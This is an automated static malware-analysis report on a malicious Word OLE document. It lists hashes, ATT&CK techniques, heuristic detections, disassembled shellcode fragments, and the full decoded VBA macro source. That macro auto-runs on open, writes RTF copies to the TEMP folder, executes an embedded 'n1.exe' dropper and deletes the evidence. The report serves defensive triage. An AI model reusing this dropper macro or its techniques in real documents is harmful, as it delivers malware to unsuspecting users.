Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 cc8b64b3f0115c9f…

MALICIOUS

Office (OLE)

94.5 KB Created: 2015-10-06 17:48:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: b68307d815f782f421fd1050d36265e5 SHA-1: bd6e6de868628c9af8c67f92166843923d8cb7e1 SHA-256: cc8b64b3f0115c9fb0b7e7b048a5090bd41e313cf6ccf3ffa85f15c31bce3c58
574 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample is a malicious Office document that uses a lure to convince the user to enable content, which then triggers VBA macros. The VBA macro 'Indefrakks' is designed to save two RTF files and then execute a dropped PE executable named 'n1.exe' from the temporary directory. This executable is embedded within the OLE structure.

Heuristics 18

  • OLE with Ole10Native — possible CVE-2026-21514 exploitation high CVE likely CVE_2026_21514
    Document contains a Word OLE object with Ole10Native plus executable, PE, or risky remote-link indicators. CVE-2026-21514 exploits OLE metadata validation; this stronger structure is treated as likely exploitation.
  • ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Sameit (2)
Shell (TEX)
Sameit (1)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Sameit (2)
Set sttKaka = CreateObject("Word.Application")
sttKaka.Visible = False
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Sub
Sub AutoOpen()
    QJHKDAJSD = "qjdilqwhdalskjdkalsjd askldjas ldjas"
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    End Sub
Sub Workbook_Open()
    HQKJASNDSA = "asjdk jksdhasdjkashdlkjlsa dahjskdas"
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
        QJHKDAJSD = "qjdilqwhdalskjdkalsjd askldjas ldjas"
    Auto_Open
End Sub
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    On Error Resume Next
TMP = Environ$("TEMP") + "\"
TEX = TMP + "n1." & "ex"
  • x86 GetPC stub (CALL $+5; POP EAX) high SC_GETPC_CALL
    x86 GetPC stub (CALL $+5; POP EAX)
    Disassembly
    Attempted x86 opcode disassembly
    00008733  e800000000        call 0x8738
00008738  58                pop eax
00008739  87d2              xchg edx, edx
0000873B  7401              je 0x873e
0000873D  90                nop
0000873E  6793              xchg ebx, eax
00008740  6793              xchg ebx, eax
00008742  7306              jae 0x874a
00008744  81e900000000      sub ecx, 0
0000874A  6623f6            and si, si
0000874D  66c1c740          rol di, 0x40
00008751  7707              ja 0x875a
00008753  52                push edx
00008754  6a8a              push -0x76
00008756  83c404            add esp, 4
00008759  5a                pop edx
0000875A  c1cba0            ror ebx, 0xa0
0000875D  f8                clc
0000875E  66a936d5          test ax, 0xd536
00008762  7706              ja 0x876a
00008764  56                push esi
00008765  6683e0ff          and ax, 0xffff
00008769  5e                pop esi
0000876A  7208              jb 0x8774
0000876C  7e06              jle 0x8774
0000876E  81c900000000      or ecx, 0
00008774  57                push edi
00008775  7b06              jnp 0x877d
00008777  55                push ebp
00008778  6683e3ff          and bx, 0xffff
0000877C  5d                pop ebp
0000877D  5f                pop edi
0000877E  56                push esi
0000877F  7f04              jg 0x8785
00008781  6683e2ff          and dx, 0xffff
00008785  5e                pop esi
00008786  55                push ebp
00008787  23d2              and edx, edx
00008789  5d                pop ebp
0000878A  55                push ebp
0000878B  7405              je 0x8792
0000878D  25ffffffff        and eax, 0xffffffff
00008792  5d                pop ebp
  • PEB access via FS segment (x86) high SC_PEB_ACCESS
    PEB access via FS segment (x86)
    Disassembly
    Attempted x86 opcode disassembly
    00007D0A  64a130000000      mov eax, dword ptr fs:[0x30]
00007D10  89c7              mov edi, eax
00007D12  894f08            mov dword ptr [edi + 8], ecx
00007D15  8b470c            mov eax, dword ptr [edi + 0xc]
00007D18  8b400c            mov eax, dword ptr [eax + 0xc]
00007D1B  894818            mov dword ptr [eax + 0x18], ecx
00007D1E  6800800000        push 0x8000
00007D23  7104              jno 0x7d29
00007D25  6683e5ff          and bp, 0xffff
00007D29  f8                clc
00007D2A  7006              jo 0x7d32
00007D2C  55                push ebp
00007D2D  51                push ecx
00007D2E  0af6              or dh, dh
00007D30  59                pop ecx
00007D31  5d                pop ebp
00007D32  6a00              push 0
00007D34  89d8              mov eax, ebx
00007D36  3500000000        xor eax, 0
00007D3B  0bd2              or edx, edx
00007D3D  25ffffffff        and eax, 0xffffffff
00007D42  2500f0ffff        and eax, 0xfffff000
00007D47  50                push eax
00007D48  8d36              lea esi, [esi]
00007D4A  55                push ebp
00007D4B  7906              jns 0x7d53
00007D4D  7c04              jl 0x7d53
00007D4F  f6df              neg bh
00007D51  f6df              neg bh
00007D53  5d                pop ebp
00007D54  f8                clc
00007D55  84c0              test al, al
00007D57  8b4228            mov eax, dword ptr [edx + 0x28]
00007D5A  0345f8            add eax, dword ptr [ebp - 8]
00007D5D  90                nop
00007D5E  7807              js 0x7d67
00007D60  7705              ja 0x7d67
00007D62  53                push ebx
00007D63  6a2b              push 0x2b
00007D65  5b                pop ebx
00007D66  5b                pop ebx
00007D67  8be4              mov esp, esp
00007D69  51                push ecx
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1452 bytes
SHA-256: 12e6e5acff32875c01f551e370c31682c3a6e7bef976aa6d87c993a16b9db85e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub JIjashdjkasd_Open()
    NQJKHDJAKSD = "askjd askljdasjhdjkashdjkasd hkasd "
End Sub
Sub AutoOpen()
    QJHKDAJSD = "qjdilqwhdalskjdkalsjd askldjas ldjas"
    Auto_Open
End Sub
Sub Indefrakks()
On Error Resume Next
TMP = Environ$("TEMP") + "\"
TEX = TMP + "n1." & "ex"
TCA = TMP + "300.rtf"
TCB = TMP + "301.rtf"
TEX = TEX + "e"

SaveAsRTF (TCA)
SaveAsRTF (TCB)
Sameit (2)
Set sttKaka = CreateObject("Word.Application")
sttKaka.Visible = False
Set docWord = sttKaka.Documents.Open(TCA)
Sameit (2)
Shell (TEX)
Sameit (1)
sttKaka.Quit
Set sttKaka = Nothing
Kill TCA
Kill TEX
End Sub
Sub Magitinal()
    QHWKJDHASJDH = "asjhd kasjdlkqjwdilqw hdjkasdhas d"
    Indefrakks
End Sub
Sub Workbook_Open()
    HQKJASNDSA = "asjdk jksdhasdjkashdlkjlsa dahjskdas"
    Magitinal
End Sub
Sub Sameit(Kalamana As Long)
Dim Jhbhds As Long
Jhbhds = Timer + Kalamana
Do While Timer < Jhbhds
DoEvents
Loop
End Sub
Public Function SaveAsRTF(Name As String)
    ActiveDocument.SaveAs FileName:=Name, FileFormat:=wdFormatRTF
End Function
Sub Auto_Open()
    Magitinal
    QUKDHASD = "asjdlaksj dlkasjd kashjd as"
End Sub
embedded_office_00007248.exe embedded-pe Office MZ+PE at offset 0x7248 67516 bytes
SHA-256: 0c5531a185abbda32b7e9a44c79b208f9c33d544329f0bfc1d64aba39da1d5a3
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_GETPC_CALL, SC_PEB_ACCESS, SC_GETPC_CALL Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1505647964/Ole10Native 47802 bytes
SHA-256: ebb702ef44d07c63cd1f81e012617b5c0bea63bc0b34274b3e427276b1597761
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_GETPC_CALL, SC_PEB_ACCESS, SC_GETPC_CALL

Open this report in the interactive analyzer, or submit your own file for analysis.